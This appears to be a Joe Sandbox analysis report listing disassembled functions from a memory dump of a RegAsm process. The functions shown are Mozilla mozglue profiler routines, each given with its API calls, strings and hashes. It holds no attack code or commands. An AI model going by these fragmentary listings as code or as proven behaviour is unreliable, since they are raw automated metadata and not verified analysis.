                                                                            • Instruction Fuzzy Hash: 7EF0AFB0A0420DBEEF119AE18C98BEEB7BF9B04319F10522AE611A15C0E77495C8C660
                                                                            Function 6CC9B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CC403D4,?), ref: 6CC9B955
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9B9A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryQueryVirtualrand_s
                                                                            • String ID:
                                                                            • API String ID: 1889792194-0
                                                                            • Opcode ID: 24872ef7b6528955813f740f226f3da6c413d6723b10964234b39344335818ec
                                                                            • Instruction ID: 66f43680a39ea0dab7724b07b212b6010b9756df0d235ffc1eea50774b211e27
                                                                            • Opcode Fuzzy Hash: 24872ef7b6528955813f740f226f3da6c413d6723b10964234b39344335818ec
                                                                            • Instruction Fuzzy Hash: BF41B671F0121DAFDF14CFA9D890ADEB7B5EF88354F14812AE505A7704EB319C458B90
                                                                            Function 6CC955F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(user32,?,6CC6E1A5), ref: 6CC95606
                                                                            • LoadLibraryW.KERNEL32(gdi32,?,6CC6E1A5), ref: 6CC9560F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC95633
                                                                            • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC9563D
                                                                            • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC9566C
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC9567D
                                                                            • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC95696
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC956B2
                                                                            • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC956CB
                                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC956E4
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC956FD
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC95716
                                                                            • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC9572F
                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC95748
                                                                            • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC95761
                                                                            • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC9577A
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC95793
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC957A8
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC957BD
                                                                            • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC957D5
                                                                            • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC957EA
                                                                            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC957FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                            • API String ID: 2238633743-1964193996
                                                                            • Opcode ID: 3394951234287e73555ebd44b89cf3b322af3ca4bf4ec0db362da85cab6028ff
                                                                            • Instruction ID: 60e0a58a143f38bf0554afb9d3c851d7e7888783ac5399ff866542497ea2477e
                                                                            • Opcode Fuzzy Hash: 3394951234287e73555ebd44b89cf3b322af3ca4bf4ec0db362da85cab6028ff
                                                                            • Instruction Fuzzy Hash: C75156787117436FDB019FF98E989263AF8AB062467104525F912E2B52FB70CD01CF78
                                                                            Function 6CC7CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC4582D), ref: 6CC7CC27
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC4582D), ref: 6CC7CC3D
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCAFE98,?,?,?,?,?,6CC4582D), ref: 6CC7CC56
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC6C
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC82
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC98
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CCAE
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC7CCC4
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC7CCDA
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC7CCEC
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC7CCFE
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC7CD14
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC7CD82
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC7CD98
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC7CDAE
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC7CDC4
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC7CDDA
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC7CDF0
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC7CE06
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC7CE1C
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC7CE32
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC7CE48
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC7CE5E
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC7CE74
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC7CE8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: strcmp
                                                                            • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                            • API String ID: 1004003707-2809817890
                                                                            • Opcode ID: 774738c5f8732272e01d692e99011a24cc8c73497f340e28a2a4dc9d6857460c
                                                                            • Instruction ID: adbd82381bcde73db592a30a0d374516a24e326067855386c7318992915e659b
                                                                            • Opcode Fuzzy Hash: 774738c5f8732272e01d692e99011a24cc8c73497f340e28a2a4dc9d6857460c
                                                                            • Instruction Fuzzy Hash: BE51DDD190662712FE2031966F14BEA2488FF6335AF108076ED19B1F80FF15D60B86B7
                                                                            Function 6CC447C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC44801
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC44817
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC4482D
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4484A
                                                                              • Part of subcall function 6CC6AB3F: EnterCriticalSection.KERNEL32(6CCBE370,?,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB49
                                                                              • Part of subcall function 6CC6AB3F: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6AB7C
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC4485F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC4487E
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4488B
                                                                            • free.MOZGLUE(?), ref: 6CC4493A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC44956
                                                                            • free.MOZGLUE(00000000), ref: 6CC44960
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4499A
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • free.MOZGLUE(?), ref: 6CC449C6
                                                                            • free.MOZGLUE(?), ref: 6CC449E9
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Strings
                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC447FC
                                                                            • [I %d/%d] profiler_shutdown, xrefs: 6CC44A06
                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC44812
                                                                            • MOZ_PROFILER_SHUTDOWN, xrefs: 6CC44A42
                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC44828
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                            • API String ID: 1340022502-4194431170
                                                                            • Opcode ID: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                            • Instruction ID: 4528e45bac91a3110eb68051d6cd8346714f0730e06b1cc446e58ced7b74a6d5
                                                                            • Opcode Fuzzy Hash: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                            • Instruction Fuzzy Hash: B881F479A001008FDB00DFA9D89475A7775FF42328F24C629E916A7F41F731E895CBAA
                                                                            Function 6CC419A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF760), ref: 6CC419BD
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC419E5
                                                                            • GetLastError.KERNEL32 ref: 6CC41A27
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC41A41
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC41A4F
                                                                            • GetLastError.KERNEL32 ref: 6CC41A92
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC41AAC
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC41ABA
                                                                            • LocalFree.KERNEL32(?), ref: 6CC41C69
                                                                            • free.MOZGLUE(?), ref: 6CC41C8F
                                                                            • free.MOZGLUE(?), ref: 6CC41C9D
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC41CAE
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF760), ref: 6CC41D52
                                                                            • GetLastError.KERNEL32 ref: 6CC41DA5
                                                                            • GetLastError.KERNEL32 ref: 6CC41DFB
                                                                            • GetLastError.KERNEL32 ref: 6CC41E49
                                                                            • GetLastError.KERNEL32 ref: 6CC41E68
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC41E9B
                                                                              • Part of subcall function 6CC42070: LoadLibraryW.KERNEL32(combase.dll,6CC41C5F), ref: 6CC420AE
                                                                              • Part of subcall function 6CC42070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6CC420CD
                                                                              • Part of subcall function 6CC42070: __Init_thread_footer.LIBCMT ref: 6CC420E1
                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC41F15
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F46
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F52
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F59
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F60
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC41F6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                            • String ID: D
                                                                            • API String ID: 290179723-2746444292
                                                                            • Opcode ID: 895717a1f73ef8b452e90a911bde63b21506f9f5c2b01cfb6e98feee1f3c86d4
                                                                            • Instruction ID: b2d026e9837cb1b370bee3bbd4b60b3b97eaf70fdfa1789b7cc74fafcc677256
                                                                            • Opcode Fuzzy Hash: 895717a1f73ef8b452e90a911bde63b21506f9f5c2b01cfb6e98feee1f3c86d4
                                                                            • Instruction Fuzzy Hash: 07F1A3B1E00725AFEB109F65CC88B9AB7B8FF49704F108199E945A7640E774DD90CFA4
                                                                            Function 6CC44470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC44730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                              • Part of subcall function 6CC44730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                            • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC444BA
                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC444D2
                                                                            • InitOnceExecuteOnce.KERNEL32(6CCBF80C,6CC3F240,?,?), ref: 6CC4451A
                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4455C
                                                                            • LoadLibraryW.KERNEL32(?), ref: 6CC44592
                                                                            • InitializeCriticalSection.KERNEL32(6CCBF770), ref: 6CC445A2
                                                                            • moz_xmalloc.MOZGLUE(00000008), ref: 6CC445AA
                                                                            • moz_xmalloc.MOZGLUE(00000018), ref: 6CC445BB
                                                                            • InitOnceExecuteOnce.KERNEL32(6CCBF818,6CC3F240,?,?), ref: 6CC44612
                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC44636
                                                                            • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC44644
                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC4466D
                                                                            • VerSetConditionMask.NTDLL ref: 6CC4469F
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446AB
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446B2
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446B9
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446C0
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC446CD
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC446F1
                                                                            • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC446FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                            • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                            • API String ID: 1702738223-3894940629
                                                                            • Opcode ID: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                            • Instruction ID: 3e7a6c8b30bb29a77aa085271ec200a7b4c2a48b054c0c8ccb6636e1dfa86017
                                                                            • Opcode Fuzzy Hash: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                            • Instruction Fuzzy Hash: 2B6113B8A00248AFEB00CFE1CC49B957BB8EB46308F24C598E904AB751F7B19945CF55
                                                                            Function 6CC7E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC77090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6CC7B9F1,?), ref: 6CC77107
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7E92D
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EA4F
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA5C
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA80
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EA8A
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7EA92
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EB11
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB1E
                                                                            • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6CC7EB3C
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB5B
                                                                              • Part of subcall function 6CC75710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC7EB71), ref: 6CC757AB
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EBA4
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6CC7EBAC
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EBC1
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000), ref: 6CC7EBCE
                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6CC7EBE5
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,00000000), ref: 6CC7EC37
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EC46
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC7EC55
                                                                            • free.MOZGLUE(00000000), ref: 6CC7EC5C
                                                                            Strings
                                                                            • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6CC7EA9B
                                                                            • [I %d/%d] profiler_start, xrefs: 6CC7EBB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                            • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                            • API String ID: 1341148965-1186885292
                                                                            • Opcode ID: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                            • Instruction ID: b960cb37aa5d12f64546b49e9ebe4fd28ef9813aa94d18133e6ad8fc90e20c31
                                                                            • Opcode Fuzzy Hash: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                            • Instruction Fuzzy Hash: FCA1373A7006148FDB109FA8C494BAABBB5FF86318F14402DE91997F51FB709845CBB5
                                                                            Function 6CC7F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F70E
                                                                            • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC7F8F9
                                                                              • Part of subcall function 6CC46390: GetCurrentThreadId.KERNEL32 ref: 6CC463D0
                                                                              • Part of subcall function 6CC46390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC463DF
                                                                              • Part of subcall function 6CC46390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC4640E
